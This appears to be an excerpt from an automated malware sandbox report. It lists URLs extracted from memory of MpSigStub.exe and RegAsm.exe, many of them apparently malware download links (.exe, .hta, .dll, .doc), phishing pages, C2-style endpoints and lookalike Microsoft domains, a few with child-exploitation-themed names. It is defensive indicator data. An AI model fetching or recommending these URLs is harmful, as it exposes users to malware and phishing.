Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://log.dataurls.com/log/settings.json
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://log.dataurls.com/log/settings.jsonxN
Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp	String found in binary or memory: http://log.newhybridhome.com/personal.dll
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://log.soomeng.com/wb/jdq/?mac=%s
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://logger.mobi
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://logins.kl.com.ua/2.msiequati/.native
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://logs-01.loggly.com/inputs
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://loisnfernandez.us/Gold/aafile.exe
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://lolitaadultfilehost.com/pc/page/set_reg.php?af_num=&cuid=
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://lookfor.cc/sp.php?pin=%05d
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://lookfor.cc?pin=%05d
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://looking-for.cc
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://looking-for.ccx
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://loscuerposgloriosos.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://lost.to/in.cgi
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://lostart.info/js/gs.js
Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/2efinys.exe
Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/c2syst.exe
Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/drmlsh.exe
Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/icnsys.exe
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://loygf-99.gq/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://ludnica.uk.to/youtube.xpi
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://luport.com/templates/konkur/language/m
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://luyitaw.com/okasle.exe
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://lychee22.grey.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://mabira.net/traff/controller.php?&ver=8&uid=
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://macr.microfsot.com/noindex.js
Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmp	String found in binary or memory: http://madthumbs.com/archive/
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: http://mahathi2.ondemandcreative.com/24.gif
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://mail.8u8y.com/ad/pic/123.txt
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://mail.autoshops.online/gbh.exe
Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp	String found in binary or memory: http://mail.bg
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://mail.daum.net/kocl/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://mail.google.com/mail/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://mail.madcoffee.com/index.php
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://mail.rambler.ru/mail/mail.cgi?mode=compose
Source: RegAsm.exe, 0000000A.00000002.7246965735.000000001E321000.00000004.00000001.sdmp	String found in binary or memory: http://mail.tccinfaes.com
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://mail.vodafone.co.uk/
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://maindating.com
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://maindating.net
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://maithanhduong.com/.well-known/pki-validation/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://majelisalanwar.org/wp-content/themes/foodica/assets/css/hp.gf
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://makevalue.com
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://maktoob.yahoo.com/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://maldonaaloverainc.com/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://malikberry.com/files101/htaanyinwa.hta
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://malikberry.com/files101/htamandela.hta
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://malikberry.com/files101/htazeco.hta
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: http://malwarec2domain.com:3550/implant.exe
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://malwaredestructor.com/?aid=347
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://malwaredestructor.com/download.php?aid=347
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://manage1lnk.pw
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://maplestory.nexon.com
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://maq.com.pk/wehsd
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://march262020.club/files/
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://march262020.com/files/
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://margate-pawn.com?
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: http://mariafordnude.com/wp/wp-admin/css/colors/coffee/reportexcelindeed.php
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://maribit.com/count11.php
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://maringareservas.com.br/queda/index.php
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: http://markpolak.com
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://masgiO.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: http://massenzadrillingrig.com/wp-content/plugins/aa/excelz/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://mastic52.ivory.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://mastiway.me/wp-includes/
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	String found in binary or memory: http://max-stats.com
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://mazbit.ovh/mykunaahfxqj/3415201.pngqhttp://mazbit.ovh/mykunaahfxqj/dd(oaoabp%&
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://mea45.com/tp/download.php?file=ota4nda5nzm4nl9fx19zzxzrzgl6ztjkcy5legu=-o%appdata%
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://mealpackage.biz/wp-admin/nbn3x/
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://media.downloadmediacentral.com/law/?decinformation=
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://media.licenseacquisition.org/drm_prompt.php
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	String found in binary or memory: http://media.vit
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://mediabusnetwork.com/phandler.php?
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://mediabusnetwork.com/preconfirm.php?aid=
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://mediaprovider.info/law/?decinformation=
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://mediasportal.com/phandler.php?sid=500&aid=281&said=9&pn=2&pid=3
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://mediastop.zigg.me
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://mediazone.uni.me/?id=
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://mega975.com.ar/sales-invoice/
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://megadowl.com/terms-ru.html
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://meganetop.co.jp/imanager/favicon.php
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://megatoolbar.net/inetcreative/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://meitao886.com/vass/vasss.doc
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://mekund.com/mkcxskjd.exe
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://melmat.cf/obago.doc
Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmp	String found in binary or memory: http://members.concealarea.com/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://members.giftera.org
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://members.xoom.com/devsfort/index.html
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://members.xoom.com/devsfort/index.htmlg
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://memberservices.passport.net/memberservice.srf
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://metclix.com
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://metznr.co/tor/index.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://mexicorxonline.com/glad/imagenes.html?disc=abuse&code=7867213
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://mfjr.info/n2l/tmp/m.vbs
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://michiganpppp.com/work/doc/9.doc
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: http://microhelptech.com/gotoassist/
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://microsoft.browser-security-center.com/blocked.php?id=
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://microsoft.erlivia.ltd/jikolo.doc
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: http://microsoftdata.linkpc.net/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://midfielders.ru/in.cgi?3&group=gdz&seoref=http%3a%2f%2fwww.google.com%2furl%3fsa%3dt%26rct%3dj
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa_
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://millennium-traders.info
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=af
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://mio98.hk/js_f.php?v=0.0
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://misc.wcd.qq.com/app?packageName=pcqqbrowser&channelId=81529
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://missing-codecs.net
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://missing-codecs.org/download/missing_file
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://mitotl.com.mx/ups.com/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://mixbunch.cn/thread.html
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: http://mmm.media-motor.net/install.php?allowsp2=0&protect=no&ttmr=0&retry=3&aff=aimaddict1&mincook=0
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://mndyprivatecloudshareandfileprotecthmvb.freeddns.org/receipt/invoice_
Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://mnrr.space/c1.xmlx
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://mobilepcstarterkit.com/
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://modernizr.com
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: http://mods1401z.webcindario.com
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://moffice.mrface.com/office.sct
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://mog.com/
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://mog.com/a
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://moha-group.ir/nazy/doc/neworder.doc
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://mondaynews.tk/cam/cm.php?v=
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://monergismbooks.com/upgrade/reportdhlnew.php
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://montiera.com//favicon.ico
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://montiera.com//favicon.icoa
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://mootolola.com/url/YU_ggsetup.html?1218x
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://morris-law-firm.com?
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://moscow1.online/proxy/assno.exe
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://moscow1.online/proxy/skapoland.exe
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://mosrezerv.ru/ups/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://moveis-schuster-com.ga/Order.jpg
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://moveisterrra.com/gb/add.php
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://movie.blogdns.org/asd
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://movie.daum.net/activeX/downloader/NcgAgentPOT_Setup.exe
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://movie1-share123vn.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6289828443.0000028BD74D2000.00000004.00000001.sdmp	String found in binary or memory: http://mp.profittrol.com/
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.baidu.com/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.baidu.com/m?tn=
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.baidu.com/m?tn=baidump3lyric&ct=
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.zhongsou.com/m?w=%s
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://mp3codecdownload.com
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://mp3codecinstall.net/xcdc/installx?id=
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://mrbfile.xyz
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://mrbfile.xyz/sql/syslib.dll
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://mrbftp.xyz
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://mrdcontact.com/purchaseneworder.doc
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://ms365box.com/update.1
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://msiesettings.com/check/
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://msjupdate.com/ff/extensions/update.rdf
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://msonlineservers.tk/parcel/dugdhl.php
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://muacangua.com/wp-admin/o_n/
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://muahangvn.blogspot.com
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://muqo.g
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://musah.info/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://music.cn.yahoo.com/lyric.html?p=%s
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: http://music.emmigo.in/?r=wmp&title=
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://music.soso.com/q?sc=mus&w=%s
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: http://music.tfeed.info/?r=wmp&title=
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://muzdownload.com
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://my-save-img.ru/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://my-save-img.ru/ip2.php
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://my-speak.eu/csioj.exe
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://my.pcmaps.net/api/report?type=
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://mybestofferstoday.com/cgi-bin/main.cgi?__rnd__
Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmp	String found in binary or memory: http://mydirecttube.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://myip.dnsomatic.com
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://myplanet.group/xuxzryvq1/ind.html
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://myredir.net/K_
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://mysearchpage.biz/customizesearch.html
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://mysearchpage.biz/home.html
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://mysibrand.info/e.js
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://mysibrand.info/s.js
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://mytube.4l.cl/?id=4&watch=zryxo7
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://mytube.hs.vc/
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://myyobe.biz?
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://myyogaberry.com?
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://n5wo.lolitasexfootube.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://n7pv51t.sed.odtllc.net
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://naka4al.ru/tds/go.php?sid=1
Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.
Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.cn/cn.dll
Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.cn/cn.dll?charset=utf-8&name=
Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.cn/cn.dll?pid=
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://nameservicehosting3.in//load.php?spl=javad
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://nathannewman.org/wp-content/themes/boldnews/includes/js/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://nation.eromariaporno.net/pc/page/set_reg.php?af_code=&cuid=
